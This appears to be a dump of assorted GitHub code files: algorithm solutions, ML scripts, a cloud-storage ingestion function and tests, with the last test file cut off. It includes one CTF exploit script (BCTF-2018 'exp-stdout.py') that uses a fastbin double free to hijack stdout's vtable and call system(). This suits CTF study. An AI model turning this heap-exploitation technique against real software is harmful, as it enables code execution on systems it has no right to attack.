+{"seq_id":"39086642746","text":"class Solution:\n def combine(self, n: int, k: int) -> List[List[int]]:\n def backtrack(idx, res, temp, nums):\n if len(list(temp)) == k:\n res.append(list(temp))\n\n for i in range(idx, len(nums)):\n temp.append(nums[i])\n backtrack(i+1, res, temp, nums)\n temp.pop()\n \n nums = []\n for i in range(1,n+1):\n nums.append(i)\n \n res, temp = [], []\n\n backtrack(0,res,temp,nums)\n\n return res","repo_name":"CodEZ47/A2SV_programming","sub_path":"combinations.py","file_name":"combinations.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73127220305","text":"import streamlit as st\nimport pandas as pd\n\nclass MyDashboard():\n def __init__(self, df=None):\n super(MyDashboard, self).__init__()\n self.df = df\n\n if self.df == None:\n self.ReadDataBase() \n \n btn = st.sidebar.button(\"Click\")\n cmb = st.sidebar.ComboBox()\n if btn:\n self.TesteClick()\n \n def ReadDataBase(self):\n self.df = pd.read_csv(r\"db/vgsales.csv\")\n print(\"Teste\")\n \n \n def TesteClick(self):\n print(\"Click button\")\n st.bar_chart(self.df[[\"Platform\",\"Rank\", \"Year\"]], x=\"Platform\",y=\"Year\")\n\nif __name__ == \"__main__\":\n MyDashboard()","repo_name":"MarcosNack/dashboard","sub_path":"mydatabase.py","file_name":"mydatabase.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3648631083","text":"from pwn import *\n\ncontext.log_level = 'debug'\np = process(\"./easiest\")\n\nstd_got = 0x60207a #stdout的got表地址\nsys_addr = 0x400946 #程序中的system函数地址\nptr_addr = 0x6020C0 #保存chunk的指针数组\n\ndef add(idx,size,content):\n\tp.recvuntil(\"2 delete \")\n\tp.sendline(\"1\")\n\tp.recvuntil(\"(0-11):\")\n\tp.sendline(str(idx))\n\tp.recvuntil(\"Length:\")\n\tp.sendline(str(size))\n\tp.recvuntil(\"C:\")\n\tp.sendline(content)\n\t\ndef delete(idx):\n\tp.recvuntil(\"2 delete \")\n\tp.sendline(\"2\")\n\tp.recvuntil(\"(0-11):\")\n\tp.sendline(str(idx))\n\nif __name__=='__main__':\n\t\n\tpayload = p64(0xdeadbeef)*7+p64(sys_addr)\n\tadd(6,0x200,payload)#将stdout中vtable地址覆盖为该chunk的地址,printf 会调用 vtable 中的 xsputn,位于虚表第八项\n\t#调整申请第几块chunk,保证:\n\t#(1)IO_FILE结构体中_lock的值必须是可写的地址\n #(2)mode的值需要为0\n\tadd(0,0x30,\"a\"*0x10)\t\n\tadd(1,0x30,\"a\"*0x10)\t\n\tadd(2,0x30,\"1\"*0x10)\t\n\tadd(4,0x100,'p'*0x10)\n\n\tdelete(2)\n\tdelete(0)\n\tdelete(2) #利用fastbin攻击修改stdout在got表上的地址\n\n\tadd(2,0x30,p64(std_got))\n\tadd(0,0x30,'xxxx')\n\tadd(0,0x30,'xxxx')\n\t#gdb.attach(p)\n\tadd(2,0x30,'x'*0x16+p64(ptr_addr+8*6-0xd8))# 64位系统下vtable在_IO_FILE_plus结构中的偏移是0xd8\n\t#所以将stdout的地址加上0xd8就是保存chunk 6的地址,即保存虚表的地址\n\tp.sendline('aaaa')\n\tp.interactive()\n","repo_name":"De4dCr0w/ctf-pwn","sub_path":"BCTF-2018/pwn/exp-stdout.py","file_name":"exp-stdout.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71209004306","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.svm import SVC\nfrom sklearn.externals import joblib\nfrom sklearn import preprocessing\nfrom sklearn.cross_validation import StratifiedShuffleSplit\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn import metrics\nfrom sklearn.metrics import precision_recall_curve\n\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.metrics import classification_report\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.feature_selection import SelectKBest\n\nfrom sklearn.metrics import average_precision_score\nimport matplotlib.pyplot as plt\nimport os\n\nfrom sklearn.datasets import load_svmlight_files\nfrom sklearn import cross_validation\nfrom sklearn.ensemble import VotingClassifier, BaggingClassifier\n\nfrom CategoryClassifier import CategoryClassifier\nfrom xgboost import XGBClassifier\n\ndef read_data_set(path, rows_to_skip):\n ds = pd.read_csv(path,sep='\\t', skiprows=rows_to_skip, header=None)\n return ds\n\ndef trainKNN(X_train,y_train):\n #normalization\n scaler = preprocessing.StandardScaler().fit(X_train)\n filename = 'KNNTrainScalar.joblib.pkl'\n joblib.dump(scaler, filename, compress=9)\n XTrainScaled = scaler.transform(X_train)\n\n # cross fitting\n # neighbors_range = [2,4,8,16,32,64]\n neighbors_range = [16,32]\n\n distance_types = ['chebyshev', 'sokalmichener',\n 'canberra', #'haversine',\n #'rogerstanimoto', 'matching',\n 'dice', 'euclidean',\n 'braycurtis', 'russellrao',\n 'cityblock', 'manhattan',\n #'infinity', 'jaccard',\n #'sokalsneath', # 'seuclidean',\n #'kulsinski', 'minkowski',\n #'mahalanobis', 'p',\n #'l2', 'hamming',\n #'l1', #'wminkowski',\n #'pyfunc']\n ]\n\n\n\n algorithms=['ball_tree']\n\n param_grid = dict(algorithm=algorithms, n_neighbors=neighbors_range, metric=distance_types)\n cv = StratifiedShuffleSplit(y_train, n_iter=5, test_size=0.2, random_state=42)\n grid = GridSearchCV(KNeighborsClassifier(), param_grid=param_grid,\n n_jobs=-1, cv=cv, verbose=100)\n grid.fit(XTrainScaled, y_train)\n\n print(\"The best parameters are %s with a score of %0.2f\" % (grid.best_params_, grid.best_score_))\n\n # train by best params\n n_neighbors = grid.best_params_['n_neighbors']\n metric = grid.best_params_['metric']\n\n clf_opt = KNeighborsClassifier(n_neighbors=n_neighbors, metric=metric)\n clf_opt.fit(XTrainScaled, y_train)\n\n filename = 'KNN.joblib.pkl'\n joblib.dump(clf_opt, filename, compress=9)\n\ndef testKNN(X_test,y_test):\n clf = joblib.load('KNN.joblib.pkl')\n scaler = joblib.load('KNNTrainScalar.joblib.pkl')\n X_testScaled = scaler.transform(X_test)\n y_pred = clf.predict(X_testScaled)\n print('KNN precision: ',metrics.precision_score(y_test, y_pred))\n print(' KNN accuracy: ',metrics.accuracy_score(y_test, y_pred))\n precision, recall, threshold = precision_recall_curve(y_test, y_pred)\n\ndef trainSVC_RBF(X_train,y_train):\n #normalization\n scaler = preprocessing.StandardScaler().fit(X_train)\n filename = 'TrainScalar.joblib.pkl'\n joblib.dump(scaler, filename, compress=9)\n XTrainScaled = scaler.transform(X_train)\n\n # cross fitting\n C_range = [2**(-5),2**(-3),2**(-1),2**(1),2**(3),2**(5),2**(5),2**(7),2**(9),2**(11),2**(13),2**(15)]\n gamma_range = [2**(-15),2**(-13),2**(-11),2**(-9),2**(-7),2**(-5),2**(-3),2**(-1),2**(1),2**(3),2**(3)]\n param_grid = dict(gamma=gamma_range, C=C_range)\n cv = StratifiedShuffleSplit(y_train, n_iter=5, test_size=0.2, random_state=42)\n grid = GridSearchCV(SVC(), param_grid=param_grid, cv=cv)\n grid.fit(XTrainScaled, y_train)\n\n print(\"The best parameters are %s with a score of %0.2f\" % (grid.best_params_, grid.best_score_))\n\n C=grid.best_params_['C']\n clf_ChromeTrainRBF = rbf_svc = SVC(kernel='rbf', gamma=grid.best_params_['gamma'], C=C)\n clf_ChromeTrainRBF.fit(XTrainScaled, y_train)\n #MultinomialNB(alpha=1.0, class_prior=None, fit_prior=False)\n filename = 'SVMRBF.joblib.pkl'\n joblib.dump(clf_ChromeTrainRBF, filename, compress=9)\n\ndef testSVC_RBF(X_test,y_test):\n clf = joblib.load('SVMRBF.joblib.pkl')\n scaler = joblib.load('TrainScalar.joblib.pkl')\n X_testScaled = scaler.transform(X_test)\n y_pred = clf.predict(X_testScaled)\n print('SVC percision: ',metrics.precision_score(y_test, y_pred))\n print('svc accuracy: ',metrics.accuracy_score(y_test, y_pred))\n precision, recall, threshold = precision_recall_curve(y_test, y_pred)\n\ndef plot_confusion_matrix(cm, eunique_label,title='Confusion matrix', cmap=plt.cm.Blues):\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(eunique_label))\n plt.xticks(tick_marks, eunique_label, rotation=45)\n plt.yticks(tick_marks, eunique_label)\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\ndef trainTestM(X_train,X_test,y_train,y_test):\n h = .02 # step size in the mesh\n\n names = [ \"Nearest Neighbors\", \"Linear SVM\", \"RBF SVM\",\"Decision Tree\",\n \"Random Forest\", \"AdaBoost\", \"Naive Bayes\", \"Linear Discriminant Analysis\",\n \"Quadratic Discriminant Analysis\"]\n classifiers = [\n KNeighborsClassifier(32),\n SVC(kernel=\"linear\", C=0.025),\n SVC(gamma=2, C=1),\n DecisionTreeClassifier(max_depth=5),\n # DecisionTreeClassifier(max_depth=5),\n RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1),\n AdaBoostClassifier(),\n GaussianNB(),\n LinearDiscriminantAnalysis(),\n QuadraticDiscriminantAnalysis()]\n\n scaler = preprocessing.StandardScaler().fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n\n # iterate over classifiers\n for name, clf in zip(names, classifiers):\n clf.fit(X_train, y_train)\n score = clf.score(X_test, y_test)\n y_pred = clf.predict(X_test)\n print('name: ',name,'score: ',score)\n print(name,' percision: ',metrics.precision_score(y_test, y_pred))\n print(name,' accuracy: ',metrics.accuracy_score(y_test, y_pred))\n class_report = classification_report(y_test, y_pred)\n out_name= 'accuracy_report_{}_.txt'.format(name)\n with open(out_name, \"w\") as text_file:\n text_file.write(class_report)\n text_file.write('percision: %s'%metrics.precision_score(y_test, y_pred))\n text_file.write(' accuracy: %s'%metrics.accuracy_score(y_test, y_pred))\n print(class_report)\n\n filename = \"clas_{}\".format(name)\n joblib.dump(clf, filename, compress=9)\n\n # Compute confusion matrix\n cm = confusion_matrix(y_test, y_pred)\n np.set_printoptions(precision=2)\n\n # Normalize the confusion matrix by row (i.e by the number of samples\n # in each class)\n cm_normalized = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print('Normalized confusion matrix')\n print(cm_normalized)\n plt.figure()\n eunique_label = np.unique(y_train.tolist())\n plot_confusion_matrix(cm_normalized, eunique_label,title='Normalized confusion matrix')\n image_name = name + \".pdf\"\n plt.savefig(image_name)\n\ndef ensembleVoting(X_train,y_train,X_test,y_test):\n scaler = preprocessing.StandardScaler().fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n # num_folds = 3\n # num_instances = len(X)\n # seed = 7\n # kfold = cross_validation.KFold(n=num_instances, n_folds=num_folds, random_state=seed)\n # create the sub models\n estimators = []\n # model1 = LogisticRegression()\n # estimators.append(('logistic', model1))\n # model2 = DecisionTreeClassifier()\n # estimators.append(('cart', model2))\n # model3 = SVC()\n # estimators.append(('svm', model2))\n # names = [ \"Nearest Neighbors\", \"Linear SVM\", \"RBF SVM\",\"Decision Tree\",\n # \"Random Forest\", \"AdaBoost\", \"Naive Bayes\", \"Linear Discriminant Analysis\",\n # \"Quadratic Discriminant Analysis\"]\n\n model1 = KNeighborsClassifier()\n estimators.append(('knn', model1))\n model2 = SVC()\n estimators.append(('svmrbf', model2))\n model3 = DecisionTreeClassifier(max_depth=20)\n estimators.append(('DecisionTree', model3))\n # model4 = LinearDiscriminantAnalysis()\n # estimators.append(('LDA', model4))\n\n # classifiers = [\n # KNeighborsClassifier(32),\n # SVC(kernel=\"linear\", C=0.025),\n # SVC(gamma=2, C=1),\n # DecisionTreeClassifier(max_depth=5),\n # RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1),\n # AdaBoostClassifier(),\n # GaussianNB(),\n # LinearDiscriminantAnalysis(),\n # QuadraticDiscriminantAnalysis()]\n\n # create the ensemble model\n ensemble = VotingClassifier(estimators)#, voting='soft', weights=[1,2,1,1])\n # ensemble.fit(X_train,y_train)\n params = {'svmrbf__gamma': [2**(-7),2**(-5),2**(-3)],\n 'svmrbf__C': [2**(5),2**(7),2**(9),2**(11),2**(13)],\n 'knn__algorithm': ['ball_tree'],\n 'knn__n_neighbors': [14, 16, 20],\n 'knn__metric': [ # 'chebyshev', 'sokalmichener',\n 'canberra'#, 'dice', 'euclidean',\n #'braycurtis', 'russellrao','cityblock', 'manhattan']}\n ]}\n\n grid = GridSearchCV(estimator=ensemble, param_grid=params, cv=5, n_jobs=-1)\n grid = grid.fit(X_train,y_train)\n print(grid.grid_scores_)\n # print(ensemble.score(X_test,y_test))\n # results = cross_validation.cross_val_score(ensemble, X, y, cv=kfold)\n # print(results.mean())\n\ndef CategoricalEnsembleVoting(X_train,y_train,X_test,y_test):\n scaler = preprocessing.StandardScaler().fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n clf = CategoryClassifier()\n clf.fit(X_train, y_train)\n print(repr(clf.score(X_test, y_test)))\n\n\"\"\" mean: 0.99819, std: 0.00051, params:\n {'svmrbf__gamma': 0.0078125, 'knn__algorithm': 'ball_tree',\n 'knn__n_neighbors': 16, 'svmrbf__C': 8192, 'knn__metric': 'canberra'} \"\"\"\ndef fiveFold():\n\n # Feature groups\n # protocol_dependent = range(13) + range(66,69)\n # protocol_dependent = range(23) + range(66,69)\n # peak features\n # protocol_dependent = range(23,41)\n # All but peak\n # protocol_dependent = range(23) + range(41,69)\n fsslv_cipher_suites = [6,7,8,9,10,11,12]\n protocol_dependent = []\n\n # Load data\n data_path = os.getcwd() + \"/data_set/libSVM\"\n\n train_0 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_0_train\"\n test_0 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_0_test\"\n train_1 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_1_train\"\n test_1 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_1_test\"\n train_2 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_2_train\"\n test_2 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_2_test\"\n train_3 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_3_train\"\n test_3 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_3_test\"\n train_4 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_4_train\"\n test_4 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_4_test\"\n\n X_train_0, y_train_0, X_test_0, y_test_0 = load_svmlight_files(\n (train_0, test_0))\n X_train_1, y_train_1, X_test_1, y_test_1 = load_svmlight_files(\n (train_1, test_1))\n X_train_2, y_train_2, X_test_2, y_test_2 = load_svmlight_files(\n (train_2, test_2))\n X_train_3, y_train_3, X_test_3, y_test_3 = load_svmlight_files(\n (train_3, test_3))\n X_train_4, y_train_4, X_test_4, y_test_4 = load_svmlight_files(\n (train_4, test_4))\n\n df_train_0 = pd.DataFrame(X_train_0.toarray())\n df_test_0 = pd.DataFrame(X_test_0.toarray())\n df_train_1 = pd.DataFrame(X_train_1.toarray())\n df_test_1 = pd.DataFrame(X_test_1.toarray())\n df_train_2 = pd.DataFrame(X_train_2.toarray())\n df_test_2 = pd.DataFrame(X_test_2.toarray())\n df_train_3 = pd.DataFrame(X_train_3.toarray())\n df_test_3 = pd.DataFrame(X_test_3.toarray())\n df_train_4 = pd.DataFrame(X_train_4.toarray())\n df_test_4 = pd.DataFrame(X_test_4.toarray())\n\n X_train_0 = df_train_0.drop(protocol_dependent, axis=1)\n X_test_0 = df_test_0.drop(protocol_dependent, axis=1)\n X_train_1 = df_train_1.drop(protocol_dependent, axis=1)\n X_test_1 = df_test_1.drop(protocol_dependent, axis=1)\n X_train_2 = df_train_2.drop(protocol_dependent, axis=1)\n X_test_2 = df_test_2.drop(protocol_dependent, axis=1)\n X_train_3 = df_train_3.drop(protocol_dependent, axis=1)\n X_test_3 = df_test_3.drop(protocol_dependent, axis=1)\n X_train_4 = df_train_4.drop(protocol_dependent, axis=1)\n X_test_4 = df_test_4.drop(protocol_dependent, axis=1)\n\n # X_train_0 = randomProtocolValues(X_train_0)\n # X_test_0 = randomProtocolValues(X_test_0)\n # X_train_1 = randomProtocolValues(X_train_1)\n # X_test_1 = randomProtocolValues(X_test_1)\n # X_train_2 = randomProtocolValues(X_train_2)\n # X_test_2 = randomProtocolValues(X_test_2)\n # X_train_3 = randomProtocolValues(X_train_3)\n # X_test_3 = randomProtocolValues(X_test_3)\n # X_train_4 = randomProtocolValues(X_train_4)\n # X_test_4 = randomProtocolValues(X_test_4)\n\n\n # Prepare ensemble method\n estimators = []\n model1 = KNeighborsClassifier(n_neighbors=16,algorithm='ball_tree',\n metric='canberra', n_jobs=-1)\n estimators.append(('knn', model1))\n model2 = SVC(gamma=0.0078125,C=8192, probability=False)\n estimators.append(('svmrbf', model2))\n model3 = DecisionTreeClassifier()#max_depth=50)\n estimators.append(('DecisionTree', model3))\n model4 = RandomForestClassifier(n_estimators=100, oob_score=True,\n n_jobs=-1)\n estimators.append(('RandomForest', model4))\n model5 = XGBClassifier(max_depth=10, n_estimators=100, learning_rate=0.1)\n estimators.append(('XGBoost', model5))\n\n # ensemble = VotingClassifier(estimators,voting='hard')\n ensemble = CategoryClassifier()\n\n # CategoricalEnsembleVoting(X_train_0, y_train_0, X_test_0, y_test_0)\n oneFold(X_train_0, y_train_0, X_test_0, y_test_0, ensemble)\n oneFold(X_train_1, y_train_1, X_test_1, y_test_1, ensemble)\n oneFold(X_train_2, y_train_2, X_test_2, y_test_2, ensemble)\n oneFold(X_train_3, y_train_3, X_test_3, y_test_3, ensemble)\n oneFold(X_train_4, y_train_4, X_test_4, y_test_4, ensemble)\n\n\ndef randomProtocolValues(X):\n # protocol features\n a = range(13) + range(66,69)\n l = len(X)\n\n for i in a:\n X[i] = np.random.random(l) * 100\n\n return X\n\n\n\ndef oneFold(X_train,y_train,X_test,y_test,clf):\n scaler = preprocessing.StandardScaler().fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n clf.fit(X_train, y_train)\n print(repr(clf.score(X_test, y_test)))\n\n#-----------------------MAIN------------------------------------------------------\nif __name__ == \"__main__\":\n\n data_path = os.getcwd() + \"/data_set\"\n all_features_path = data_path + \"/samples_25.2.16_all_features_triple.csv\"\n # all_features_path = data_path + \"/samples_17.7.16_all_features_app.csv\"\n rows_to_skip = [0]\n ds = read_data_set(all_features_path, rows_to_skip=rows_to_skip)\n # print repr(ds)\n\n ds = ds.dropna()\n y = ds.iloc[:,len(ds.columns)-1]\n # num_classes, y = np.unique(y, return_inverse=True)\n # X = ds.drop([str(len(ds.columns)-1)], axis=1)\n X = ds.drop([len(ds.columns)-1], axis=1)\n # X = ds.drop([2,4,9,11], axis=1)\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)\n\n # trainTestM(X_train,X_test,y_train,y_test)\n # trainKNN(X_train,y_train)\n # testKNN(X_test,y_test)\n # ensembleVoting(X_train, y_train, X_test, y_test)\n # CategoricalEnsembleVoting(X_train, y_train, X_test, y_test)\n fiveFold()\n","repo_name":"JonMuehlst/ml-score","sub_path":"featureClassification.py","file_name":"featureClassification.py","file_ext":"py","file_size_in_byte":16437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13080508225","text":"# coding:utf-8\n# 特征分析\nimport numpy as np\nimport pandas as pd \nfrom matplotlib.pyplot import *\n\n\ndata = pd.read_csv('data.train.csv')\n\nvar = np.log(.3+data['item_buy_count'])\n#var = np.exp(var)\nbins = np.linspace(min(var),max(var)*1.01,100)\nlog_likehood = []\nnum = []\nfor i in range(1,len(bins)):\n candidate = data[(var=bins[i-1])]\n likehood = np.sum(candidate['buy']==1)*1.0/(1+np.sum(candidate['buy']==0))\n log_likehood.append((likehood))\n num.append(len(candidate))\nsemilogy(bins[1:],log_likehood,'ro')\nshow()\nsemilogy(bins[1:],(1+np.array(num)),'ro')\nshow()\n","repo_name":"tracholar/alibaba2015","sub_path":"feature_analysis.py","file_name":"feature_analysis.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"18314387281","text":"# Serverless Project\n# Author : Yashesh Savani\n# Date Created: 24th July, 2020\n# Task: Ingest chat json files from google cloud storage to s3 bucket\n\nfrom google.cloud import storage\nimport boto3\nimport os\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = os.path.join(os.getcwd(), \"Serverless Project-data processing.json\")\n\ndef ingest_chat_files():\n\n GCP_BUCKET = os.getenv(\"GCP_BUCKET\")\n S3_BUCKET = os.getenv(\"S3_BUCKET\")\n # Create object of cloud storage client and get blob object of file\n client_storage = storage.Client()\n file_blobs_list = client_storage.list_blobs(GCP_BUCKET)\n src_bucket_object = client_storage.bucket(GCP_BUCKET)\n\n s3_client = boto3.client(\"s3\")\n\n # Loop through all the file objects got from GCP storage\n for jsonfile in file_blobs_list:\n src_bucket_blob = src_bucket_object.get_blob(jsonfile.name)\n file_data = src_bucket_blob.download_as_string()\n s3_client.put_object(Bucket=S3_BUCKET, Key=jsonfile.name, Body=file_data)\n\n\nif __name__ == \"__main__\":\n ingest_chat_files()\n\nfrom google.cloud import storage\nimport boto3\nimport os\n\n\ndef hello_world(request):\n GCP_BUCKET = os.getenv(\"GCP_BUCKET\")\n S3_BUCKET = os.getenv(\"S3_BUCKET\")\n # Create object of cloud storage client and get blob object of file\n client_storage = storage.Client()\n file_blobs_list = client_storage.list_blobs(GCP_BUCKET)\n src_bucket_object = client_storage.bucket(GCP_BUCKET)\n print(\"GCP CONNECTED\")\n # create client of S3\n s3_client = boto3.client(\"s3\", aws_access_key_id=os.getenv(\"aws_access_key_id\"),\n aws_secret_access_key=os.getenv(\"aws_secret_access_key\"),\n aws_session_token=os.getenv(\"aws_session_token\"))\n print(\"Donnnnnne\")\n # Loop through all the file objects got from GCP storage\n for jsonfile in file_blobs_list:\n src_bucket_blob = src_bucket_object.get_blob(jsonfile.name)\n file_data = src_bucket_blob.download_as_string()\n\n # Create files in S3 bucket\n s3_client.put_object(Bucket=S3_BUCKET, Key=jsonfile.name, Body=file_data)\n\n return {\"Chat files tagged\", 200}","repo_name":"vikashsalvi/DAL_LMS","sub_path":"Machine learning analysis 2/ingest_chat.py","file_name":"ingest_chat.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32659958219","text":"# 모래시계 모양이 되야하므로\n# 1 1 1\n# 0 1 0\n# 1 1 1\n# 모양이 있을때, 위 3X3배열에서 1이 있는곳(즉, 그 위치에 있는 값들)을 모두 더한값을 구한다\n\n# Complete the hourglassSum function below.\ndef hourglassSum(arr):\n maximum = -999999 # 임의로 최대값을 지정\n for i in range(len(arr)) :\n if i+2 < len(arr) : # 모래시계모양이 될 곳을 지정한다\n for j in range(len(arr[i])) :\n if j+2 < len(arr[i]) : # 모래시계모양대로 해당 지점에 있는 값을 모두 더한다 \n tmp = arr[i][j] + arr[i][j+1] + arr[i][j+2] + arr[i+1][j+1] + arr[i+2][j] + arr[i+2][j+1] + arr[i+2][j+2]\n if tmp > maximum :\n maximum = tmp\n \n return maximum\n ","repo_name":"KimHyungkeun/Algorithm","sub_path":"HackerRank/Arrays/2D_Array_DS.py","file_name":"2D_Array_DS.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71418731985","text":"from datetime import datetime, timedelta\nimport requests\n\nclass LinkedInConfig:\n\n def GetLinkedinRefreshToken(self, CLIENT_SECRET, CLIENTID):\n API_URL = f'https://www.linkedin.com/oauth/v2/accessToken?grant_type=client_credentials&client_id={CLIENTID}&' \\\n f'client_secret={CLIENT_SECRET}'\n return requests.get(API_URL).json()['access_token']\n\n def __init__(self):\n with open('env/linkedin.txt') as fi:\n self.CLIENT_SECRET = fi.readline().rstrip('\\n')\n self.CLIENTID = '77plycpp70x634'\n self.TOKEN = LinkedInConfig.GetLinkedinRefreshToken(self, self.CLIENT_SECRET, self.CLIENTID)\n self.MEASURE_PERIOD = 'WEEK' # Day or Week\n self.MEASURE_PERIOD_LOOKAHEAD = 1 # In days, can be a max of 14 days whether using DAY (14) or WEEK (2)\n self.MEASURE_PERIOD_START = round((datetime.now() + timedelta(-7)).timestamp() * 1000) # epoch datetime now\n self.PAGE_COUNT = 1000\n self.PAGE_START = 0\n self.ASSET_TYPE = ['COURSE', 'VIDEO', 'ARTICLE', 'BOOK', 'EVENT', 'LEARNING_COLLECTION', 'LEARNING_PATH',\n 'DOCUMENT']\n self.HEADERS = {'Authorization': 'Bearer ' + self.TOKEN,\n 'Connection': 'keep-alive'}\n self.DBTABLE = 'LinkedInLearning_ActivityReports'\n\n\n\n","repo_name":"L1nc0lnV/linkedin-learning-reports","sub_path":"settings/linkedin.py","file_name":"linkedin.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22661699117","text":"lines = [x.strip() for x in open('input.txt', 'r')]\n\npadding = 2\n\ncoding = lines[0].replace('#', '1').replace('.', '0')\nimage = [\"0\" * padding + l.replace('#', '1').replace('.', '0') + \"0\" * padding for l in lines[2:]]\nimage = [*[\"0\" * len(image[0]) for _ in range(padding)], *image, *[\"0\" * len(image[0]) for _ in range(padding)]]\n\ndef get_index(image, x, y):\n s = image[y-1][x-1:x+2] + image[y][x-1:x+2] + image[y+1][x-1:x+2]\n return int(s, 2)\n\ndef get_new(image, c, padding = 0):\n new_image = [\n *[c * (len(image[0]) + padding*2-2) for _ in range(padding)]\n ]\n\n for y in range(1, len(image) - 1):\n new_image.append(c * padding)\n for x in range(1, len(image[0]) - 1):\n i = get_index(image, x, y)\n new_image[-1] += coding[i]\n new_image[-1] += c * padding\n \n for _ in range(padding):\n new_image.append(c * (len(image[0]) + padding*2-2))\n\n return new_image\n \nc = 0\nfor l in get_new(get_new(image, '1', 2), '0', 0):\n c += l.count('1')\nprint(c)\n\nfor i in range(25):\n image = get_new(image, '1', 2)\n image = get_new(image, '0', 2)\n\nc = 0\nfor l in image:\n c += l.count('1')\nprint(c)","repo_name":"whymatter/AdventOfCode2021","sub_path":"puzzle_20/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6832173452","text":"# An example for break\nlist = [5, 6, 7, 8, 9]\nfor word in list:\n if word == 8:\n print(\"Break encountered\")\n break\n print(word)\n\nlist = [5, 6, 7, 8, 9]\nfor word in list:\n if word == 8:\n print(\"Skipping the 8\")\n continue\n print(word)\n","repo_name":"HiteshGarg/codingeek","sub_path":"Python/break and continue.py","file_name":"break and continue.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"2344602408","text":"import sys\n\nt = int(sys.stdin.readline())\n\nfor _ in range(t):\n res = []\n n = int(sys.stdin.readline())\n c = sys.stdin.readline().split()\n\n # 첫 번째 카드는 조건의 상관없이 리스트에 추가한다.\n res.append(c[0])\n\n # 첫 번째 카드를 제외한 카드부터 마지막 카드까지 비교한다.\n for i in range(1, n):\n\n # 아스키코드로 비교한다.\n # 첫번째 카드의 아스키코드가 다음 카드의 아스키 코드보다 작으면 제일 뒤에 카드를 추가한다.\n if ord(res[0]) < ord(c[i]):\n res.append(c[i])\n\n # 반대로 첫번째 카드 아스키코드가 크면 인덱스 기준으로 0번째자리에 다음 카드를 추가한다.\n else:\n res.insert(0, c[i])\n\n # join 함수를 통해 리스트를 문자열로 바꿔 출력한다.\n print(''.join(res))\n","repo_name":"junjange/CodingTest","sub_path":"baekjoon/Greedy_Algorithm/13417.py","file_name":"13417.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33520085784","text":"import unittest\nimport pandas as pd\nimport sys\n\nsys.path.insert(0, \"..\")\nfrom aplication.app import NetflixHistoryScreen, setUp\n\n\nclass NetflixList(unittest.TestCase):\n app = setUp()\n app.screen_manager = app.build()\n\n def testGenerateListFromCSV(self):\n NHS = NetflixHistoryScreen()\n NHS.loadHistory(\"./sampledata/data_with_genres.csv\")\n\n with open(\"./sampledata/data_with_genres.csv\") as file:\n reader = pd.read_csv(file)\n data = list(reader)\n\n all_films = []\n for i in NHS.list_of_films.children:\n all_films.append(i.text)\n\n for l1, l2 in zip(data, all_films):\n self.assertEqual(l1, l2)\n\n\nclass NetflixSearch(unittest.TestCase):\n app = setUp()\n app.screen_manager = app.build()\n\n def testNetflixListSearch(self):\n NHS = NetflixHistoryScreen()\n NHS.loadHistory(\"./sampledata/data_with_genres.csv\")\n NHS.searchTitle(\"The\")\n\n with 